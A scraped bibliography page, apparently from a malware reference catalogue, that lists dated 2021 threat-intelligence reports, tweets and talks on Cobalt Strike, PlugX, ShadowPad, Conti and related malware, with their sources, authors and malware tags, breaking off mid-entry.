Unit 42Tweet on TA551 (Shathak) BazarLoader infection with CobaltStrike and DarkVNC drops BazarBackdoor

Cobalt Strike

×Select Content2021-11-04

Youtube (Virus Bulletin)

Joey Chen,

Yi-Jhen HsiehShadowPad: the masterpiece of privately sold malware in Chinese espionage PlugX

ShadowPad

×Select Content2021-11-03

Cisco Talos

Caitlin Huey,

Chetan Raghuprasad,

Vanja SvajcerMicrosoft Exchange vulnerabilities exploited once again for ransomware, this time with Babuk Babuk

CHINACHOPPER

×Select Content2021-11-03

Didier Stevens

Didier StevensNew Tool: cs-extract-key.py Cobalt Strike

×Select Content2021-11-03

nviso

Didier StevensCobalt Strike: Using Process Memory To Decrypt Traffic – Part 3 Cobalt Strike

×Select Content2021-11-02

Intel 471

Intel 471Cybercrime underground flush with shipping companies’ credentials Cobalt Strike

Conti

×Select Content2021-11-02

unh4ck

Cyb3rSn0rlaxDetecting CONTI CobaltStrike Lateral Movement Techniques - Part 2 Cobalt Strike

Conti

×Select Content2021-11-02

boschko.ca blog

Olivier LaflammeCobalt Strike Process Injection Cobalt Strike

×Select Content2021-11-01

The DFIR Report

@iiamaleks,

@samaritan_oFrom Zero to Domain Admin Cobalt Strike

Hancitor

×Select Content2021-11-01

Accenture

Curt Wilson,

Heather Larrieu,

Katrina HillDiving into double extortion campaigns Cobalt Strike

MimiKatz

×Select Content2021-10-29

Europol

Europol12 targeted for involvement in ransomware attacks against critical infrastructure Cobalt Strike

Dharma

LockerGoga

MegaCortex

TrickBot

×Select Content2021-10-29

Національна поліція України

Національна поліція УкраїниCyberpolice exposes transnational criminal group in causing $ 120 million in damage to foreign companies Cobalt Strike

Dharma

LockerGoga

MegaCortex

TrickBot

×Select Content2021-10-27

nviso

Didier StevensCobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2 Cobalt Strike

×Select Content2021-10-26

unh4ck

Hamza OUADIADetecting CONTI CobaltStrike Lateral Movement Techniques - Part 1 Cobalt Strike

Conti

×Select Content2021-10-26

Kaspersky

Kaspersky Lab ICS CERTAPT attacks on industrial organizations in H1 2021 8.t Dropper

AllaKore

AsyncRAT

GoldMax

LimeRAT

NjRAT

NoxPlayer

Raindrop

ReverseRAT

ShadowPad

Zebrocy

×Select Content2021-10-26

Cisco Talos

Edmund Brumaghin,

Mariano Graziano,

Nick MavisSQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike Cobalt Strike

QakBot

Squirrelwaffle

×Select Content2021-10-26

ANSSIIdentification of a new cyber criminal group: Lockean Cobalt Strike

DoppelPaymer

Egregor

Maze

PwndLocker

QakBot

REvil

×Select Content2021-10-21

CrowdStrike

Alex Clinton,

Tasha RobinsonStopping GRACEFUL SPIDER: Falcon Complete’s Fast Response to Recent SolarWinds Serv-U Exploit Campaign Cobalt Strike

FlawedGrace

TinyMet

×Select Content2021-10-21

nviso

Didier StevensCobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1 Cobalt Strike

×Select Content2021-10-18

The DFIR Report

The DFIR ReportIcedID to XingLocker Ransomware in 24 hours Cobalt Strike

IcedID

Mount Locker

×Select Content2021-10-18

NortonLifeLock

Norton LabsOperation Exorcist - 7 Years of Targeted Attacks against the Roman Catholic Church NewBounce

PlugX

Zupdax

×Select Content2021-10-18

Symantec

Threat Hunter TeamHarvester: Nation-state-backed group uses new toolset to target victims in South Asia Cobalt Strike

Graphon

×Select Content2021-10-18

paloalto Netoworks: Unit42

Brad DuncanCase Study: From BazarLoader to Network Reconnaissance BazarBackdoor

Cobalt Strike

×Select Content2021-10-14

Medium walmartglobaltech

Jason ReavesInvestigation into the state of NIM malware Part 2 Cobalt Strike

NimGrabber

Nimrev

Unidentified 088 (Nim Ransomware)

×Select Content2021-10-13

Blackberry

BlackBerry Research & Intelligence TeamBlackBerry Shines Spotlight on Evolving Cobalt Strike Threat in New Book Cobalt Strike

×Select Content2021-10-12

Mandiant

Alyssa RahmanDefining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis Cobalt Strike

×Select Content2021-10-11

Accenture

Accenture Cyber Threat IntelligenceMoving Left of the Ransomware Boom REvil

Cobalt Strike

MimiKatz

RagnarLocker

REvil

×Select Content2021-10-08

0ffset Blog

Chuong DongSQUIRRELWAFFLE – Analysing The Main Loader Cobalt Strike

Squirrelwaffle

×Select Content2021-10-07

Netskope

Ghanashyam Satpathy,

Gustavo PalazoloSquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot Cobalt Strike

QakBot

Squirrelwaffle

×Select Content2021-10-07

Mandiant

Mandiant Research TeamFIN12 Group Profile: FIN12 Priotizes Speed to Deploy Ransomware Aginst High-Value Targets Cobalt Strike

Empire Downloader

TrickBot

×Select Content2021-10-06

Blackberry

Blackberry ResearchFinding Beacons in the Dark Cobalt Strike

×Select Content2021-10-05

Blackberry

The BlackBerry Research & Intelligence TeamDrawing a Dragon: Connecting the Dots to Find APT41 Cobalt Strike

Ghost RAT

×Select Content2021-10-04

Sophos

Chaitanya Ghorpade,

Kajal Katiyar,

Krisztián Diriczi,

Rahil Shah,

Sean Gallagher,

Vikas SinghAtom Silo ransomware actors use Confluence exploit, DLL side-load for stealthy attack ATOMSILO

Cobalt Strike

×Select Content2021-10-04

The DFIR Report

The DFIR ReportBazarLoader and the Conti Leaks BazarBackdoor

Cobalt Strike

Conti

×Select Content2021-10-03

Github (0xjxd)

Joel DönneSquirrelWaffle - From Maldoc to Cobalt Strike Cobalt Strike

Squirrelwaffle

×Select Content2021-10-01

0ffset Blog

Chuong DongSQUIRRELWAFFLE – Analysing the Custom Packer Cobalt Strike

Squirrelwaffle

×Select Content2021-09-30

PTSecurity

PT ESC Threat IntelligenceMasters of Mimicry: new APT group ChamelGang and its arsenal Cobalt Strike

×Select Content2021-09-30

PT Expert Security CenterMasters of Mimicry: new APT group ChamelGang and its arsenal Cobalt Strike

×Select Content2021-09-30

CrowdStrike

Falcon OverWatch TeamHunting for the Confluence Exploitation: When Falcon OverWatch Becomes the First Line of Defense Cobalt Strike

×Select Content2021-09-29

Advanced Intelligence

Vitali Kremez,

Yelisey BoguslavskiyBackup “Removal” Solutions - From Conti Ransomware With Love Cobalt Strike

Conti

×Select Content2021-09-29

Malware Traffic Analysis

Brad Duncan2021-09-29 (Wednesday) - Hancitor with Cobalt Strike Cobalt Strike

Hancitor

×Select Content2021-09-29

Malware Traffic Analysis

Brad DuncanHancitor with Cobalt Strike Cobalt Strike

Hancitor

×Select Content2021-09-28

Recorded Future

Insikt Group®4 Chinese APT Groups Identified Targeting Mail Server of Afghan Telecommunications Firm Roshan PlugX

Winnti

×Select Content2021-09-28

Zscaler

Avinash Kumar,

Brett Stone-GrossSquirrelwaffle: New Loader Delivering Cobalt Strike Cobalt Strike

Squirrelwaffle

×Select Content2021-09-27

Cynet

Max MalyutinA Virtual Baffle to Battle Squirrelwaffle Cobalt Strike

Squirrelwaffle

×Select Content2021-09-26

NSFOCUS

Jie JiInsights into Ransomware Spread Using Exchange 1-Day Vulnerabilities 1-2 Cobalt Strike

LockFile

×Select Content2021-09-24

Trend Micro

Warren Sto.TomasExamining the Cring Ransomware Techniques Cobalt Strike

Cring

MimiKatz

×Select Content2021-09-22

CISA

US-CERTAlert (AA21-265A) Conti Ransomware Cobalt Strike

Conti

×Select Content2021-09-21

Medium elis531989

Eli SalemThe Squirrel Strikes Back: Analysis of the newly emerged cobalt-strike loader “SquirrelWaffle” Cobalt Strike

Squirrelwaffle

×Select Content2021-09-21

skyblue.team blog

skyblue teamScanning VirusTotal's firehose Cobalt Strike

×Select Content2021-09-21

GuidePoint Security

Drew SchmittA Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike Cobalt Strike

×Select Content2021-09-21

Sophos

Andrew Brandt,

Chaitanya Ghorpade,

Krisztián Diriczi,

Shefali Gupta,

Vikas SinghCring ransomware group exploits ancient ColdFusion server Cobalt Strike

Cring

×Select Content2021-09-21

eSentire

eSentireRansomware Hackers Attack a Top Safety Testing Org. Using Tactics and Techniques Borrowed from Chinese Espionage Groups Cobalt Strike

MimiKatz

UNC215

×Select Content2021-09-17

CrowdStrike

Falcon OverWatch TeamFalcon OverWatch Hunts Down Adversaries Where They Hide BazarBackdoor

Cobalt Strike

×Select Content2021-09-17

Medium inteloperator

Intel OperatorThe default: 63 6f 62 61 6c 74 strike Cobalt Strike

×Select Content2021-09-17

Malware Traffic Analysis

Brad Duncan2021-09-17 - SQUIRRELWAFFLE Loader with Cobalt Strike Cobalt Strike

Squirrelwaffle

×Select Content2021-09-16

Twitter (@GossiTheDog)

Kevin BeaumontTweet on some unknown threat actor dropping Mgbot, custom IIS modular backdoor and cobalstrike using exploiting ProxyShell Cobalt Strike

MgBot

×Select Content2021-09-16

Medium Shabarkin

Pavel ShabarkinPointer: Hunting Cobalt Strike globally Cobalt Strike

×Select Content2021-09-16

RiskIQ

RiskIQUntangling the Spider Web: The Curious Connection Between WIZARD SPIDER’s Ransomware Infrastructure and a Windows Zero-Day Exploit Cobalt Strike

Ryuk

×Select Content2021-09-15

Microsoft

Microsoft 365 Defender Threat Intelligence Team,

Microsoft Threat Intelligence Center (MSTIC)Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability Cobalt Strike

×Select Content2021-09-14

McAfee

Christiaan BeekOperation ‘Harvest’: A Deep Dive into a Long-term Campaign MimiKatz

PlugX

Winnti

×Select Content2021-09-14

Recorded Future

Insikt Group®Full-Spectrum Cobalt Strike Detection Cobalt Strike

×Select Content2021-09-13

The DFIR Report

The DFIR ReportBazarLoader to Conti Ransomware in 32 Hours BazarBackdoor

Cobalt Strike

Conti

×Select Content2021-09-12

Medium michaelkoczwara

Michael KoczwaraMapping and Pivoting from Cobalt Strike C2 Infrastructure Attributed to CVE-2021-40444 Cobalt Strike

×Select Content2021-09-10

Gigamon

Joe SlowikRendering Threats: A Network Perspective BumbleBee

Cobalt Strike

×Select Content2021-09-10

The Record

Catalin CimpanuIndonesian intelligence agency compromised in suspected Chinese hack PlugX

×Select Content2021-09-09

Trend Micro

Trend MicroRemote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs BumbleBee

Cobalt Strike

×Select Content2021-09-09

Symantec

Threat Hunter TeamGrayfly: Chinese Threat Actor Uses Newly-discovered Sidewalk Malware CROSSWALK

MimiKatz

SideWalk

×Select Content2021-09-08

Arash's Blog

Arash ParsaHook Heaps and Live Free Cobalt Strike

×Select Content2021-09-07

Medium michaelkoczwara

Michael KoczwaraCobalt Strike C2 Hunting with Shodan Cobalt Strike

×Select Content2021-09-06

kienmanowar Blog

m4n0w4rQuick analysis CobaltStrike loader and shellcode Cobalt Strike

×Select Content2021-09-03

FireEye

Adrian Sanchez Hernandez,

Alex Pennino,

Andrew Rector,

Brendan McKeague,

Govand Sinjari,

Harris Ansari,

John Wolfram,

Joshua Goddard,

Yash GuptaPST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers CHINACHOPPER

HTran

×Select Content2021-09-03

Sophos

Anand Ajjan,

Andrew Ludgate,

Gabor Szappanos,

Peter Mackenzie,

Sean Gallagher,

Sergio Bestulic,

Syed ZaidiConti affiliates use ProxyShell Exchange exploit in ransomware attacks Cobalt Strike

Conti

×Select Content2021-09-03

Trend Micro

Mohamad MokbelThe State of SSL/TLS Certificate Usage in Malware C&C Communications AdWind

ostap

AsyncRAT

BazarBackdoor

BitRAT

Buer

Chthonic

CloudEyE

Cobalt Strike

DCRat

Dridex

FindPOS

GootKit

Gozi

IcedID

ISFB

Nanocore RAT

Orcus RAT

PandaBanker

Qadars

QakBot

Quasar RAT

Rockloader

ServHelper

Shifu

SManager

TorrentLocker

TrickBot

Vawtrak

Zeus

Zloader

×Select Content2021-09-02

Medium michaelkoczwara

Michael KoczwaraCobalt Strike PowerShell Payload Analysis Cobalt Strike

×Select Content2021-09-02

Twitter (@th3_protoCOL)

Colin,

GaborSzappanosTweet on Confluence Server exploitation (CVE-2021-26084) in the wild and cobaltsrike activity (mentioned in replies by GaborSzappanos) Cobalt Strike

×Select Content2021-09-01

YouTube (Black Hat)

Aragorn Tseng,

Charles LiMem2Img: Memory-Resident Malware Detection via Convolution Neural Network Cobalt Strike

PlugX

Waterbear

×Select Content2021-09-01

YouTube (Hack In The Box Security Conference)

Joey Chen,

Yi-Jhen HsiehSHADOWPAD: Chinese Espionage Malware-as-a-Service PlugX

ShadowPad

×Select Content2021-08-31

BreakPoint Labs

BreakPoint LabsCobalt Strike and Ransomware – Tracking An Effective Ransomware Campaign Cobalt Strike

×Select Content2021-08-30

Qianxin

Red Raindrop TeamOperation (Thủy Tinh) OceanStorm: The evil lotus hidden under the abyss Cobalt Strike

MimiKatz

×Select Content2021-08-29

The DFIR Report

The DFIR ReportCobalt Strike, a Defender’s Guide Cobalt Strike

×Select Content2021-08-27

Aon

Aon’s Cyber Labs,

Noah RubinCobalt Strike Configuration Extractor and Parser Cobalt Strike

×Select Content2021-08-27

Morphisec

Morphisec LabsProxyShell Exchange Exploitation Now Leads To An Increasing Amount Of Cobaltstrike Backdoors Cobalt Strike

×Select Content2021-08-25

Trend Micro

Hara Hiroaki,

Ted LeeEarth Baku An APT Group Targeting Indo-Pacific Countries With New Stealth Loaders and Backdoor Cobalt Strike

SideWalk

×Select Content2021-08-24

ESET Research

Mathieu Tartare,

Thibaut PassillyThe SideWalk may be as dangerous as the CROSSWALK Cobalt Strike

CROSSWALK

SideWalk

SparklingGoblin

×Select Content2021-08-23

Youtube (SANS Digital Forensics and Incident Response)

Chad TilburyKeynote: Cobalt Strike Threat Hunting Cobalt Strike

×Select Content2021-08-23

FBI

FBIIndicators of Compromise Associated with OnePercent Group Ransomware Cobalt Strike

MimiKatz

×Select Content2021-08-23

SentinelOne

Joey Chen,

Yi-Jhen HsiehShadowPad: the Masterpiece of Privately Sold Malware in Chinese Espionage PlugX

ShadowPad

×Select Content2021-08-19

Sentinel LABS

Joey Chen,

Yi-Jhen HsiehShadowPad | A Masterpiece of Privately Sold Malware in Chinese Espionage ShadowPad

×Select Content2021-08-19

Blackberry

BlackBerry Research & Intelligence TeamBlackBerry Prevents: Threat Actor Group TA575 and Dridex Malware Cobalt Strike

Dridex

TA575

×Select Content2021-08-19

Sekoia

sekoiaAn insider insights into Conti operations – Part two Cobalt Strike

Conti

×Select Content2021-08-18

Intezer

Ryan RobinsonCobalt Strike: Detect this Persistent Threat Cobalt Strike

×Select Content2021-08-17

Advanced Intelligence

Vitali Kremez,

Yelisey BoguslavskiyHunting for Corporate Insurance Policies: Indicators of [Ransom] Exfiltration Cobalt Strike

Conti

×Select Content2021-08-17

Sekoia

sekoiaAn insider insights into Conti operations – Part one Cobalt Strike

Conti

×Select Content2021-08-17

Medium michaelkoczwara

Michael KoczwaraCobalt Strike Hunting — DLL Hijacking/Attack Analysis Cobalt Strike

×Select Content2021-08-15

Symantec

Threat Hunter TeamThe Ransomware Threat Babuk

BlackMatter

DarkSide

Avaddon

Babuk

BADHATCH

BazarBackdoor

BlackMatter

Clop

Cobalt Strike

Conti

DarkSide

DoppelPaymer

Egregor

Emotet

FiveHands

FriedEx

Hades

IcedID

LockBit

Maze

MegaCortex

MimiKatz

QakBot

RagnarLocker

REvil

Ryuk

TrickBot

WastedLocker

×Select Content2021-08-12

Sentinel LABS

SentinelLabsShadowPad: A Masterpiece of Privately Sold Malware in Chinese Espionage ShadowPad

Earth Lusca

×Select Content2021-08-11

Advanced Intelligence

Vitali KremezSecret "Backdoor" Behind Conti Ransomware Operation: Introducing Atera Agent Cobalt Strike

Conti

×Select Content2021-08-09

IstroSec

Ladislav BačoAPT Cobalt Strike Campaign targeting Slovakia (DEF CON talk) Cobalt Strike

×Select Content2021-08-05

Secureworks

Counter Threat Unit ResearchTeamDetecting Cobalt Strike: Government-Sponsored Threat Groups (APT32) Cobalt Strike

×Select Content2021-08-05

Red Canary

Brian Donohue,

Dan Cotton,

Tony LambertWhen Dridex and Cobalt Strike give you Grief Cobalt Strike

DoppelDridex

DoppelPaymer

×Select Content2021-08-04

Sentinel LABS

Gal KristalHotcobalt – New Cobalt Strike DoS Vulnerability That Lets You Halt Operations Cobalt Strike

×Select Content2021-08-04

Secureworks

Counter Threat Unit ResearchTeamDetecting Cobalt Strike: Cybercrime Attacks (GOLD LAGOON) Cobalt Strike

×Select Content2021-08-04

CrowdStrike

CrowdStrike Intelligence Team,

CrowdStrike IR,

Falcon OverWatch TeamPROPHET SPIDER Exploits Oracle WebLogic to Facilitate Ransomware Activity Cobalt Strike

Egregor

Mount Locker

Prophet Spider

×Select Content2021-08-03

Cybereason

Assaf Dahan,

Daniel Frank,

Lior Rochberger,

Tom FaktermanDeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos CHINACHOPPER

Cobalt Strike

MimiKatz

Nebulae

×Select Content2021-08-02

Youtube (Forschungsinstitut Cyber Defense)

Alexander Rausch,

Konstantin KlingerThe CODE 2021: Workshop presentation and demonstration about CobaltStrike Cobalt Strike

×Select Content2021-08-01

The DFIR Report

The DFIR ReportBazarCall to Conti Ransomware via Trickbot and Cobalt Strike BazarBackdoor

Cobalt Strike

Conti

TrickBot

×Select Content2021-07-30

Twitter (@Unit42_Intel)

Unit 42Tweet on BazarLoader infection leading to cobaltstrike and Powershell script file for PrintNightmare vulnerability BazarBackdoor

Cobalt Strike

×Select Content2021-07-29

Rasta Mouse

Rasta MouseNTLM Relaying via Cobalt Strike Cobalt Strike

×Select Content2021-07-29

Microsoft

Microsoft 365 Defender Threat Intelligence TeamBazaCall: Phony call centers lead to exfiltration and ransomware BazarBackdoor

Cobalt Strike

×Select Content2021-07-27

Blackberry

BlackBerry Research & Intelligence TeamOld Dogs New Tricks: Attackers Adopt Exotic Programming Languages elf.wellmess

ElectroRAT

BazarNimrod

Buer

Cobalt Strike

Remcos

Snake

TeleBot

WellMess

Zebrocy

×Select Content2021-07-27

Palo Alto Networks Unit 42

Alex Hinchliffe,

Mike HarbisonTHOR: Previously Unseen PlugX Variant Deployed During Microsoft Exchange Server Attacks by PKPLUG Group PlugX

×Select Content2021-07-25

Medium svch0st

svch0stGuide to Named Pipes and Hunting for Cobalt Strike Pipes Cobalt Strike

×Select Content2021-07-22

Medium michaelkoczwara

Michael KoczwaraCobalt Strike Hunting — simple PCAP and Beacon Analysis Cobalt Strike

×Select Content2021-07-21

Bitdefender

Bogdan Botezatu,

Victor VrabieLuminousMoth – PlugX, File Exfiltration and Persistence Revisited PlugX

×Select Content2021-07-20

Secureworks

Counter Threat Unit ResearchTeamOngoing Campaign Leveraging Exchange Vulnerability Potentially Linked to Iran CHINACHOPPER

MimiKatz

RGDoor

×Select Content2021-07-19

The DFIR Report

The DFIR ReportIcedID and Cobalt Strike vs Antivirus Cobalt Strike

IcedID

×Select Content2021-07-14

Google

Clement Lecigne,

Google Threat Analysis Group,

Maddie StoneHow We Protect Users From 0-Day Attacks (CVE-2021-21166, CVE-2021-30551, CVE-2021-33742, CVE-2021-1879) Cobalt Strike

×Select Content2021-07-14

MDSec

Chris BasnettInvestigating a Suspicious Service Cobalt Strike

×Select Content2021-07-14

Kaspersky

Aseel Kayal,

Mark Lechtik,

Paul RascagnèresLuminousMoth APT: Sweeping attacks for the chosen few Cobalt Strike

×Select Content2021-07-13

YouTube ( Matt Soseman)

Matt SosemanSolarwinds and SUNBURST attacks compromised my lab! Cobalt Strike

Raindrop

SUNBURST

TEARDROP

×Select Content2021-07-09

InfoSec Handlers Diary Blog

Brad DuncanHancitor tries XLL as initial malware file Cobalt Strike

Hancitor

×Select Content2021-07-08

Avast Decoded

Threat Intelligence TeamDecoding Cobalt Strike: Understanding Payloads Cobalt Strike

Empire Downloader

×Select Content2021-07-08

PTSecurity

Denis KuvshinovHow winnti APT grouping works Korlia

ShadowPad

Winnti

×Select Content2021-07-08

Recorded Future

Insikt GroupChinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling Cobalt Strike

Earth Lusca

×Select Content2021-07-08

Recorded Future

Insikt Group®Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling ShadowPad

Spyder

Winnti

×Select Content2021-07-08

YouTube (PT Product Update)

Denis KuvshinovHow winnti APT grouping works Korlia

ShadowPad

Winnti

×Select Content2021-07-07

Trustwave

Nikita Kazymirskyi,

Rodel MendrezDiving Deeper Into the Kaseya VSA Attack: REvil Returns and Other Hackers Are Riding Their Coattails Cobalt Strike

REvil

×Select Content2021-07-07

Trend Micro

Gloria Chen,

Jaromír Hořejší,

Joseph C Chen,

Kenney LuBIOPASS RAT: New Malware Sniffs Victims via Live Streaming BIOPASS

Cobalt Strike

Derusbi

×Select Content2021-07-07

McAfee

McAfee LabsRyuk Ransomware Now Targeting Webservers Cobalt Strike

Ryuk

×Select Content2021-07-06

Twitter (@MBThreatIntel)

Malwarebytes Threat IntelligenceTweet on a malspam campaign that is taking advantage of Kaseya VSA ransomware attack to drop CobaltStrike Cobalt Strike

×Select Content2021-07-05

Trend Micro

Abraham Camba,

Buddy Tancio,

Catherine Loveria,

Ryan MaglaqueTracking Cobalt Strike: A Trend Micro Vision One Investigation Cobalt Strike

×Select Content2021-07-03

Medium AK1001

AK1001Analyzing Cobalt Strike PowerShell Payload Cobalt Strike

×Select Content2021-07-02

MalwareBookReports

muziSkip the Middleman: Dridex Document to Cobalt Strike Cobalt Strike

Dridex

×Select Content2021-07-01

The Record

Catalin CimpanuMongolian certificate authority hacked eight times, compromised with malware Cobalt Strike

×Select Content2021-07-01

Avast Decoded

Igor Morgenstern,

Jan Vojtěšek,

Luigino CamastraBackdoored Client from Mongolian CA MonPass Cobalt Strike

Earth Lusca

×Select Content2021-07-01

Avast Decoded

Igor Morgenstern,

Jan Vojtěšek,

Luigino CamastraBackdoored Client from Mongolian CA MonPass Cobalt Strike

FishMaster

×Select Content2021-06-30

Group-IB

Oleg SkulkinREvil Twins Deep Dive into Prolific RaaS Affiliates' TTPs Cobalt Strike

REvil

×Select Content2021-06-29

Accenture

Accenture SecurityHADES ransomware operators continue attacks Cobalt Strike

Hades

MimiKatz

×Select Content2021-06-29

Proofpoint

Daniel Blackford,

Selena LarsonCobalt Strike: Favorite Tool from APT to Crimeware Cobalt Strike

×Select Content2021-06-28

The DFIR Report

The DFIR ReportHancitor Continues to Push Cobalt Strike Cobalt Strike

Hancitor

×Select Content2021-06-22

CrowdStrike

The Falcon Complete TeamResponse When Minutes Matter: Falcon Complete Disrupts WIZARD SPIDER eCrime Operators Cobalt Strike

×Select Content2021-06-22

Twitter (@Cryptolaemus1)

Cryptolaemus,

dao ming si,

Kirk SayreTweet on TA575, a Dridex affiliate delivering cobaltstrike (packed withe Cryptone) directly via the macro docs Cobalt Strike

Dridex

×Select Content2021-06-20

The DFIR Report

The DFIR ReportFrom Word to Lateral Movement in 1 Hour Cobalt Strike

IcedID

×Select Content2021-06-18

SecurityScorecard

Ryan SherstobitoffSecurityScorecard Finds USAID Hack Much Larger Than Initially Thought Cobalt Strike

×Select Content2021-06-17

Binary Defense

Brandon GeorgeAnalysis of Hancitor – When Boring Begets Beacon Cobalt Strike

Ficker Stealer

Hancitor

×Select Content2021-06-16

Mandiant

Jared Wilson,

Jordan Nuce,

Justin Moore,

Mike Hunhoff,

Nick Harbour,

Robert Dean,

Tyler McLellanSmoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise Cobalt Strike

SMOKEDHAM

×Select Content2021-06-16

Recorded Future

Insikt Group®Threat Activity Group RedFoxtrot Linked to China’s PLA Unit 69010; Targets Bordering Asian Countries Icefog

PcShare

PlugX

Poison Ivy

QuickHeal

DAGGER PANDA

×Select Content2021-06-16

Національної поліції України

Національна поліція УкраїниCyberpolice exposes hacker group in spreading encryption virus and causing half a billion dollars in damage to foreign companies Clop

Cobalt Strike

FlawedAmmyy

×Select Content2021-06-16

FireEye

Jared Wilson,

Justin Moore,

Mike Hunhoff,

Nick Harbour,

Robert Dean,

Tyler McLellanSmoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise Cobalt Strike

SMOKEDHAM

×Select Content2021-06-15

Secureworks

Counter Threat Unit ResearchTeamHades Ransomware Operators Use Distinctive Tactics and Infrastructure Cobalt Strike

Hades

×Select Content2021-06-12

Twitter (@AltShiftPrtScn)

Peter MackenzieA thread on RagnarLocker ransomware group's TTP seen in an Incident Response Cobalt Strike

RagnarLocker

×Select Content2021-06-10

Group-IB

Nikita RostovcevBig airline heist APT41 likely behind massive supply chain attack Cobalt Strike

×Select Content2021-06-10

ESET Research

Adam BurgherBackdoorDiplomacy: Upgrading from Quarian to Turian CHINACHOPPER

DoublePulsar

EternalRocks

turian

BackdoorDiplomacy

×Select Content2021-06-09

Twitter (@RedDrip7)

RedDrip7Tweet on in the wild exploit of CVE-2021-26868 (according to @_clem1) Cobalt Strike

×Select Content2021-06-04

Twitter (@alex_lanstein)

Alex LansteinTweet on UNC2652/NOBELIUM targeting IOS users exploiting CVE-​2021-1879 Cobalt Strike

×Select Content2021-06-04

Inky

Roger KayColonial Pipeline Ransomware Hack Unleashes Flood of Related Phishing Attempts Cobalt Strike

×Select Content2021-06-02

Sophos

Sean GallagherAMSI bypasses remain tricks of the malware trade Agent Tesla

Cobalt Strike

Meterpreter

×Select Content2021-06-02

Medium CyCraft

CyCraft Technology CorpChina-Linked Threat Group Targets Taiwan Critical Infrastructure, Smokescreen Ransomware Cobalt Strike

ColdLock

×Select Content2021-06-02

Twitter (@xorhex)

XorhexTweet on new variant of PlugX from RedDelta Group PlugX

×Select Content2021-06-02

xorhex blog

Twitter (@xorhex)RedDelta PlugX Undergoing Changes and Overlapping Again with Mustang Panda PlugX Infrastructure PlugX

×Select Content2021-06-01

Department of Justice

Office of Public AffairsJustice Department Announces Court-Authorized Seizure of Domain Names Used in Furtherance of Spear-Phishing Campaign Posing as U.S. Agency for International Development Cobalt Strike

×Select Content2021-06-01

SentinelOne

Juan Andrés Guerrero-SaadeNobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks Cobalt Strike

×Select Content2021-06-01

SANS

Jake Williams,

Kevin HaleyA Contrarian View on SolarWinds Cobalt Strike

Raindrop

SUNBURST

TEARDROP

×Select Content2021-06-01

Microsoft

Microsoft 365 Defender Threat Intelligence Team,

Microsoft Threat Intelligence Center (MSTIC)New sophisticated email-based attack from NOBELIUM Cobalt Strike

×Select Content2021-05-29

Twitter (@elisalem9)

Eli SalemTweet on obfuscation mechanism and extraction procedure of COBALTSTRIKE beacon module used by NOBELIUM/UNC2452 Cobalt Strike

×Select Content2021-05-28

CISA

US-CERTMalware Analysis Report (AR21-148A): Cobalt Strike Beacon Cobalt Strike

×Select Content2021-05-28

CISA

US-CERTAlert (AA21-148A): Sophisticated Spearphishing Campaign Targets Government Organizations, IGOs, and NGOs Cobalt Strike

×Select Content2021-05-28

Microsoft

Microsoft Threat Intelligence Center (MSTIC)Breaking down NOBELIUM’s latest early-stage toolset BOOMBOX

Cobalt Strike

×Select Content2021-05-27

Volexity

Damien Cash,

Josh Grunzweig,

Matthew Meltzer,

Sean Koessel,

Steven Adair,

Thomas LancasterSuspected APT29 Operation Launches Election Fraud Themed Phishing Campaigns Cobalt Strike

×Select Content2021-05-27

xorhex blog

Twitter (@xorhex)Mustang Panda PlugX - Reused Mutex and Folder Found in the Extracted Config PlugX

×Select Content2021-05-26

DeepInstinct

Ron Ben YizhakA Deep Dive into Packing Software CryptOne Cobalt Strike

Dridex

Emotet

Gozi

ISFB

Mailto

QakBot

SmokeLoader

WastedLocker

Zloader

×Select Content2021-05-25

Huntress Labs

Matthew BrennanCobalt Strikes Again: An Analysis of Obfuscated Malware Cobalt Strike

×Select Content2021-05-21

blackarrow

Pablo AmbiteLeveraging Microsoft Teams to persist and cover up Cobalt Strike traffic Cobalt Strike

×Select Content2021-05-19

Intel 471

Intel 471Look how many cybercriminals love Cobalt Strike BazarBackdoor

Cobalt Strike

Hancitor

QakBot

SmokeLoader

SystemBC

TrickBot

×Select Content2021-05-19

Medium Mehmet Ergene

Mehmet ErgeneEnterprise Scale Threat Hunting: Network Beacon Detection with Unsupervised ML and KQL — Part 2 Cobalt Strike

×Select Content2021-05-18

Sophos

Greg Iddon,

John Shier,

Mat Gangwer,

Peter MackenzieThe Active Adversary Playbook 2021 Cobalt Strike

MimiKatz

×Select Content2021-05-17

Talos

Brad GarnettCase Study: Incident Response is a relationship-driven business Cobalt Strike

×Select Content2021-05-17

xorhex blog

Twitter (@xorhex)Mustang Panda PlugX - 45.251.240.55 Pivot PlugX

×Select Content2021-05-16

NCSC Ireland

NCSC IrelandRansomware Attack on Health Sector - UPDATE 2021-05-16 Cobalt Strike

Conti

×Select Content2021-05-14

GuidePoint Security

Drew SchmittFrom ZLoader to DarkSide: A Ransomware Story DarkSide

Cobalt Strike

Zloader

×Select Content2021-05-14

Blue Team Blog

Auth 0rDarkSide Ransomware Operations – Preventions and Detections. Cobalt Strike

DarkSide

×Select Content2021-05-13

AWAKE

Kieran EvansCatching the White Stork in Flight Cobalt Strike

MimiKatz

RMS

×Select Content2021-05-12

Medium Mehmet Ergene

Mehmet ErgeneEnterprise Scale Threat Hunting: Network Beacon Detection with Unsupervised ML and KQL — Part 1 Cobalt Strike

×Select Content2021-05-12

The DFIR ReportConti Ransomware Cobalt Strike

Conti

IcedID

×Select Content2021-05-11

Mal-Eats

mal_eatsCampo, a New Attack Campaign Targeting Japan AnchorDNS

BazarBackdoor

campoloader

Cobalt Strike

Phobos

Snifula

TrickBot

Zloader

×Select Content2021-05-11

FireEye

Alyssa Rahman,

Andrew Moore,

Brendan McKeague,

Jared Wilson,

Jeremy Kennelly,

Jordan Nuce,

